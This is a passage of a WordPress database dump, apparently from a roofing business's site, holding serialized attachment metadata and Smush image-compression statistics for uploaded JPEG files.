:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1661345378\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";}}'),(607,471,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:34.61076876918462;s:5:\"bytes\";i:29993;s:11:\"size_before\";i:86658;s:10:\"size_after\";i:56665;s:4:\"time\";d:0.11;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:11:\"footerthumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:67.02;s:5:\"bytes\";i:7055;s:11:\"size_before\";i:10526;s:10:\"size_after\";i:3471;s:4:\"time\";d:0.01;}s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:49.72;s:5:\"bytes\";i:7220;s:11:\"size_before\";i:14520;s:10:\"size_after\";i:7300;s:4:\"time\";d:0.02;}s:14:\"complete_thumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:22.96;s:5:\"bytes\";i:8047;s:11:\"size_before\";i:35055;s:10:\"size_after\";i:27008;s:4:\"time\";d:0.02;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:28.89;s:5:\"bytes\";i:7671;s:11:\"size_before\";i:26557;s:10:\"size_after\";i:18886;s:4:\"time\";d:0.06;}}}'),(608,472,'_wp_attached_file','2022/08/5.jpg'),(609,472,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:715;s:6:\"height\";i:504;s:4:\"file\";s:13:\"2022/08/5.jpg\";s:8:\"filesize\";s:5:\"97355\";s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:13:\"5-300x211.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:211;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"24326\";}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:13:\"5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"13818\";}s:14:\"complete_thumb\";a:5:{s:4:\"file\";s:13:\"5-400x270.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"35098\";}s:11:\"footerthumb\";a:5:{s:4:\"file\";s:12:\"5-100x84.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:84;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"10137\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:5:\"Joyce\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1661345450\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";}}'),(610,472,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:35.26427517720289;s:5:\"bytes\";i:29403;s:11:\"size_before\";i:83379;s:10:\"size_after\";i:53976;s:4:\"time\";d:0.1;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:51.81;s:5:\"bytes\";i:7159;s:11:\"size_before\";i:13818;s:10:\"size_after\";i:6659;s:4:\"time\";d:0.02;}s:11:\"footerthumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:69.16;s:5:\"bytes\";i:7011;s:11:\"size_before\";i:10137;s:10:\"size_after\";i:3126;s:4:\"time\";d:0.02;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:30.77;s:5:\"bytes\";i:7485;s:11:\"size_before\";i:24326;s:10:\"size_after\";i:16841;s:4:\"time\";d:0.03;}s:14:\"complete_thumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:22.08;s:5:\"bytes\";i:7748;s:11:\"size_before\";i:35098;s:10:\"size_after\";i:27350;s:4:\"time\";d:0.03;}}}'),(611,473,'_wp_attached_file','2022/08/6.jpg'),(612,473,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:336;s:6:\"height\";i:444;s:4:\"file\";s:13:\"2022/08/6.jpg\";s:8:\"filesize\";s:5:\"29991\";s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:13:\"6-227x300.jpg\";s:5:\"width\";i:227;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"19562\";}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:13:\"6-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"12363\";}s:14:\"complete_thumb\";a:5:{s:4:\"file\";s:13:\"6-336x270.jpg\";s:5:\"width\";i:336;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"22380\";}s:11:\"footerthumb\";a:5:{s:4:\"file\";s:12:\"6-100x84.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:84;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:4:\"9744\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:5:\"Joyce\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1661345789\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";}}'),(613,473,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:43.94604131212041;s:5:\"bytes\";i:28147;s:11:\"size_before\";i:64049;s:10:\"size_after\";i:35902;s:4:\"time\";d:0.19;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:11:\"footerthumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:71.46;s:5:\"bytes\";i:6963;s:11:\"size_before\";i:9744;s:10:\"size_after\";i:2781;s:4:\"time\";d:0.01;}s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:57.03;s:5:\"bytes\";i:7051;s:11:\"size_before\";i:12363;s:10:\"size_after\";i:5312;s:4:\"time\";d:0.01;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:36.74;s:5:\"bytes\";i:7188;s:11:\"size_before\";i:19562;s:10:\"size_after\";i:12374;s:4:\"time\";d:0.09;}s:14:\"complete_thumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:31.03;s:5:\"bytes\";i:6945;s:11:\"size_before\";i:22380;s:10:\"size_after\";i:15435;s:4:\"time\";d:0.08;}}}'),(614,484,'_wp_attached_file','2022/08/atlas-roof-shingles.jpg'),(615,484,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:306;s:6:\"height\";i:170;s:4:\"file\";s:31:\"2022/08/atlas-roof-shingles.jpg\";s:8:\"filesize\";s:5:\"16306\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:31:\"atlas-roof-shingles-300x167.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:167;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"15014\";}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:31:\"atlas-roof-shingles-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"11151\";}s:11:\"footerthumb\";a:5:{s:4:\"file\";s:30:\"atlas-roof-shingles-100x84.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:84;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:4:\"9352\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:5:\"Joyce\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1661346615\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";}}'),(616,484,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:60.75682067742208;s:5:\"bytes\";i:21579;s:11:\"size_before\";i:35517;s:10:\"size_after\";i:13938;s:4:\"time\";d:0.03;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:3:{s:11:\"footerthumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:74.64;s:5:\"bytes\";i:6980;s:11:\"size_before\";i:9352;s:10:\"size_after\";i:2372;s:4:\"time\";d:0.01;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:49.59;s:5:\"bytes\";i:7446;s:11:\"size_before\";i:15014;s:10:\"size_after\";i:7568;s:4:\"time\";d:0.01;}s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:64.15;s:5:\"bytes\";i:7153;s:11:\"size_before\";i:11151;s:10:\"size_after\";i:3998;s:4:\"time\";d:0.01;}}}'),(617,485,'_wp_attached_file','2022/08/owens-corning.jpg'),(618,485,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:297;s:6:\"height\";i:98;s:4:\"file\";s:25:\"2022/08/owens-corning.jpg\";s:8:\"filesize\";s:5:\"17085\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"owens-corning-150x98.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:98;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"12743\";}s:11:\"footerthumb\";a:5:{s:4:\"file\";s:24:\"owens-corning-100x84.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:84;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"10385\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:5:\"Joyce\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1661346584\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";}}'),(619,486,'_wp_attached_file','2022/08/tamco.jpg'),(620,486,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:291;s:6:\"height\";i:129;s:4:\"file\";s:17:\"2022/08/tamco.jpg\";s:8:\"filesize\";s:5:\"18355\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"tamco-150x129.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:129;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"12933\";}s:11:\"footerthumb\";a:5:{s:4:\"file\";s:16:\"tamco-100x84.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:84;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";s:5:\"10326\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:5:\"Joyce\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1661346643\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";}}'),(621,485,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:62.12815634728468;s:5:\"bytes\";i:14369;s:11:\"size_before\";i:23128;s:10:\"size_after\";i:8759;s:4:\"time\";d:0.05;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:2:{s:11:\"footerthumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:68.29;s:5:\"bytes\";i:7092;s:11:\"size_before\";i:10385;s:10:\"size_after\";i:3293;s:4:\"time\";d:0.01;}s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:57.11;s:5:\"bytes\";i:7277;s:11:\"size_before\";i:12743;s:10:\"size_after\";i:5466;s:4:\"time\";d:0.04;}}}'),(622,486,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:61.004342405090505;s:5:\"bytes\";i:14189;s:11:\"size_before\";i:23259;s:10:\"size_after\";i:9070;s:4:\"time\";d:0.02;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:2:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:55.27;s:5:\"bytes\";i:7148;s:11:\"size_before\";i:12933;s:10:\"size_after\";i:5785;s:4:\"time\";d:0.01;}s:11:\"footerthumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:68.19;s:5:\"bytes\";i:7041;s:11:\"size_before\";i:10326;s:10:\"size_after\";i:3285;s:4:\"time\";d:0.01;}}}'),(640,436,'wp-smush-lossy','1'),(641,437,'wp-smush-lossy','1'),(642,438,'wp-smush-lossy','1'),(643,439,'wp-smush-lossy','1'),(644,440,'wp-smush-lossy','1'),(645,441,'wp-smush-lossy','1'),(646,442,'wp-smush-lossy','1'),(647,443,'wp-smush-lossy','1'),(648,444,'wp-smush-lossy','1'),(649,445,'wp-smush-lossy','1'),(650,446,'wp-smush-lossy','1'),(651,447,'wp-smush-lossy','1'),(652,448,'wp-smush-lossy','1'),(653,449,'wp-smush-lossy','1'),(654,450,'wp-smush-lossy','1'),(655,458,'wp-smush-lossy','1'),(656,459,'wp-smush-lossy','1'),(657,460,'wp-smush-lossy','1'),(658,467,'wp-smush-lossy','1'),(659,468,'wp-smush-lossy','1'),(660,469,'wp-smush-lossy','1'),(661,471,'wp-smush-lossy','1'),(662,472,'wp-smush-lossy','1'),(663,473,'wp-smush-lossy','1'),(664,484,'wp-smush-lossy','1'),(665,485,'wp-smush-lossy','1'),(666,486,'wp-smush-lossy','1'),(667,15,'wp-smush-lossy','1'),(668,15,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:8.923309172500078;s:5:\"bytes\";i:8630;s:11:\"size_before\";i:96713;s:10:\"size_after\";i:88083;s:4:\"time\";d:0.12;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.15;s:5:\"bytes\";i:748;s:11:\"size_before\";i:6706;s:10:\"size_after\";i:5958;s:4:\"time\";d:0.01;}s:11:\"footerthumb\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:1983;s:10:\"size_after\";i:1983;s:4:\"time\";d:0.01;}s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.69;s:5:\"bytes\";i:262;s:11:\"size_before\";i:3914;s:10:\"size_after\";i:3652;s:4:\"time\";d:0.01;}s:14:\"complete_thumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.8;s:5:\"bytes\";i:1210;s:11:\"size_before\";i:13747;s:10:\"size_after\";i:12537;s:4:\"time\";d:0.02;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.19;s:5:\"bytes\";i:2535;s:11:\"size_before\";i:27589;s:10:\"size_after\";i:25054;s:4:\"time\";d:0.03;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.06;s:5:\"bytes\";i:3875;s:11:\"size_before\";i:42774;s:10:\"size_after\";i:38899;s:4:\"time\";d:0.04;}}}'),(669,16,'wp-smush-lossy','1'),(670,16,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:20.124266482568174;s:5:\"bytes\";i:12243;s:11:\"size_before\";i:60837;s:10:\"size_after\";i:48594;s:4:\"time\";d:0.08;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.91;s:5:\"bytes\";i:1556;s:11:\"size_before\";i:8227;s:10:\"size_after\";i:6671;s:4:\"time\";d:0.01;}s:11:\"footerthumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.4;s:5:\"bytes\";i:603;s:11:\"size_before\";i:3916;s:10:\"size_after\";i:3313;s:4:\"time\";d:0.02;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.86;s:5:\"bytes\";i:4041;s:11:\"size_before\";i:19372;s:10:\"size_after\";i:15331;s:4:\"time\";d:0.01;}s:14:\"complete_thumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.61;s:5:\"bytes\";i:6043;s:11:\"size_before\";i:29322;s:10:\"size_after\";i:23279;s:4:\"time\";d:0.04;}}}'),(671,17,'wp-smush-lossy','1'),(672,17,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:15.642397512833488;s:5:\"bytes\";i:4327;s:11:\"size_before\";i:27662;s:10:\"size_after\";i:23335;s:4:\"time\";d:0.06;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.63;s:5:\"bytes\";i:402;s:11:\"size_before\";i:3783;s:10:\"size_after\";i:3381;s:4:\"time\";d:0.01;}s:11:\"footerthumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:0.54;s:5:\"bytes\";i:10;s:11:\"size_before\";i:1862;s:10:\"size_after\";i:1852;s:4:\"time\";d:0.01;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.7;s:5:\"bytes\";i:1453;s:11:\"size_before\";i:8701;s:10:\"size_after\";i:7248;s:4:\"time\";d:0.01;}s:14:\"complete_thumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.49;s:5:\"bytes\";i:2462;s:11:\"size_before\";i:13316;s:10:\"size_after\";i:10854;s:4:\"time\";d:0.03;}}}'),(673,18,'wp-smush-lossy','1'),(674,18,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:23.102866779089375;s:5:\"bytes\";i:137;s:11:\"size_before\";i:593;s:10:\"size_after\";i:456;s:4:\"time\";d:0.01;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:1:{s:4:\"full\";O:8:\"stdClass\":5:{s:7:\"percent\";d:23.1;s:5:\"bytes\";i:137;s:11:\"size_before\";i:593;s:10:\"size_after\";i:456;s:4:\"time\";d:0.01;}}}'),(675,19,'wp-smush-lossy','1'),(676,19,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:24.833702882483372;s:5:\"bytes\";i:112;s:11:\"size_before\";i:451;s:10:\"size_after\";i:339;s:4:\"time\";d:0.02;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:1:{s:4:\"full\";O:8:\"stdClass\":5:{s:7:\"percent\";d:24.83;s:5:\"bytes\";i:112;s:11:\"size_before\";i:451;s:10:\"size_after\";i:339;s:4:\"time\";d:0.02;}}}'),(677,20,'wp-smush-lossy','1'),(678,20,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:19.900064772832422;s:5:\"bytes\";i:10753;s:11:\"size_before\";i:54035;s:10:\"size_after\";i:43282;s:4:\"time\";d:0.07;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.42;s:5:\"bytes\";i:1156;s:11:\"size_before\";i:6635;s:10:\"size_after\";i:5479;s:4:\"time\";d:0.02;}s:11:\"footerthumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.73;s:5:\"bytes\";i:360;s:11:\"size_before\";i:3356;s:10:\"size_after\";i:2996;s:4:\"time\";d:0.01;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:21.18;s:5:\"bytes\";i:4128;s:11:\"size_before\";i:19494;s:10:\"size_after\";i:15366;s:4:\"time\";d:0.02;}s:14:\"complete_thumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.81;s:5:\"bytes\";i:5109;s:11:\"size_before\";i:24550;s:10:\"size_after\";i:19441;s:4:\"time\";d:0.02;}}}'),(679,21,'wp-smush-lossy','1'),(680,21,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:13.784150246660703;s:5:\"bytes\";i:4778;s:11:\"size_before\";i:34663;s:10:\"size_after\";i:29885;s:4:\"time\";d:0.060000000000000005;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.48;s:5:\"bytes\";i:580;s:11:\"size_before\";i:5051;s:10:\"size_after\";i:4471;s:4:\"time\";d:0.01;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.08;s:5:\"bytes\";i:1857;s:11:\"size_before\";i:12318;s:10:\"size_after\";i:10461;s:4:\"time\";d:0.02;}s:11:\"footerthumb\";O:8:\"stdClass\":5:{s:7:\"percent\";i:6;s:5:\"bytes\";i:150;s:11:\"size_before\";i:2501;s:10:\"size_after\";i:2351;s:4:\"time\";d:0.02;}s:14:\"complete_thumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.81;s:5:\"bytes\";i:2191;s:11:\"size_before\";i:14793;s:10:\"size_after\";i:12602;s:4:\"time\";d:0.01;}}}'),(681,22,'wp-smush-lossy','1'),(682,22,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:79.69474065014039;s:5:\"bytes\";i:46262;s:11:\"size_before\";i:58049;s:10:\"size_after\";i:11787;s:4:\"time\";d:0.16;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:11:\"footerthumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:71.83;s:5:\"bytes\";i:2193;s:11:\"size_before\";i:3053;s:10:\"size_after\";i:860;s:4:\"time\";d:0.02;}s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:80.01;s:5:\"bytes\";i:7538;s:11:\"size_before\";i:9421;s:10:\"size_after\";i:1883;s:4:\"time\";d:0.04;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:79.98;s:5:\"bytes\";i:19386;s:11:\"size_before\";i:24238;s:10:\"size_after\";i:4852;s:4:\"time\";d:0.05;}s:14:\"complete_thumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:80.35;s:5:\"bytes\";i:17145;s:11:\"size_before\";i:21337;s:10:\"size_after\";i:4192;s:4:\"time\";d:0.05;}}}'),(683,23,'wp-smush-lossy','1'),(684,23,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:30.304621848739494;s:5:\"bytes\";i:577;s:11:\"size_before\";i:1904;s:10:\"size_after\";i:1327;s:4:\"time\";d:0.01;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:1:{s:4:\"full\";O:8:\"stdClass\":5:{s:7:\"percent\";d:30.3;s:5:\"bytes\";i:577;s:11:\"size_before\";i:1904;s:10:\"size_after\";i:1327;s:4:\"time\";d:0.01;}}}'),(685,24,'wp-smush-lossy','1'),(686,24,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:31.44016227180527;s:5:\"bytes\";i:465;s:11:\"size_before\";i:1479;s:10:\"size_after\";i:1014;s:4:\"time\";d:0.01;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:1:{s:4:\"full\";O:8:\"stdClass\":5:{s:7:\"percent\";d:31.44;s:5:\"bytes\";i:465;s:11:\"size_before\";i:1479;s:10:\"size_after\";i:1014;s:4:\"time\";d:0.01;}}}'),(687,25,'wp-smush-lossy','1'),(688,25,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:25.816485225505442;s:5:\"bytes\";i:498;s:11:\"size_before\";i:1929;s:10:\"size_after\";i:1431;s:4:\"time\";d:0.01;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:1:{s:4:\"full\";O:8:\"stdClass\":5:{s:7:\"percent\";d:25.82;s:5:\"bytes\";i:498;s:11:\"size_before\";i:1929;s:10:\"size_after\";i:1431;s:4:\"time\";d:0.01;}}}'),(689,26,'wp-smush-lossy','1'),(690,26,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:30.304621848739494;s:5:\"bytes\";i:577;s:11:\"size_before\";i:1904;s:10:\"size_after\";i:1327;s:4:\"time\";d:0.02;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:1:{s:4:\"full\";O:8:\"stdClass\":5:{s:7:\"percent\";d:30.3;s:5:\"bytes\";i:577;s:11:\"size_before\";i:1904;s:10:\"size_after\";i:1327;s:4:\"time\";d:0.02;}}}'),(691,27,'wp-smush-lossy','1'),(692,27,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:39.660285791318415;s:5:\"bytes\";i:1471;s:11:\"size_before\";i:3709;s:10:\"size_after\";i:2238;s:4:\"time\";d:0.03;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:1:{s:4:\"full\";O:8:\"stdClass\":5:{s:7:\"percent\";d:39.66;s:5:\"bytes\";i:1471;s:11:\"size_before\";i:3709;s:10:\"size_after\";i:2238;s:4:\"time\";d:0.03;}}}'),(693,28,'wp-smush-lossy','1'),(694,28,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:33.64067439409905;s:5:\"bytes\";i:1277;s:11:\"size_before\";i:3796;s:10:\"size_after\";i:2519;s:4:\"time\";d:0.02;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:1:{s:4:\"full\";O:8:\"stdClass\":5:{s:7:\"percent\";d:33.64;s:5:\"bytes\";i:1277;s:11:\"size_before\";i:3796;s:10:\"size_after\";i:2519;s:4:\"time\";d:0.02;}}}'),(695,29,'wp-smush-lossy','1'),(696,29,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:20.764552562988705;s:5:\"bytes\";i:478;s:11:\"size_before\";i:2302;s:10:\"size_after\";i:1824;s:4:\"time\";d:0.06;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:1:{s:4:\"full\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.76;s:5:\"bytes\";i:478;s:11:\"size_before\";i:2302;s:10:\"size_after\";i:1824;s:4:\"time\";d:0.06;}}}'),(697,30,'wp-smush-lossy','1'),(698,30,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:29.91212653778559;s:5:\"bytes\";i:851;s:11:\"size_before\";i:2845;s:10:\"size_after\";i:1994;s:4:\"time\";d:0.01;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:1;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:1:{s:4:\"full\";O:8:\"stdClass\":5:{s:7:\"percent\";d:29.91;s:5:\"bytes\";i:851;s:11:\"size_before\";i:2845;s:10:\"size_after\";i:1994;s:4:\"time\";d:0.01;}}}'),(699,31,'wp-smush-lossy','1'),(700,31,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:29.235607017956326;s:5:\"bytes\";i:99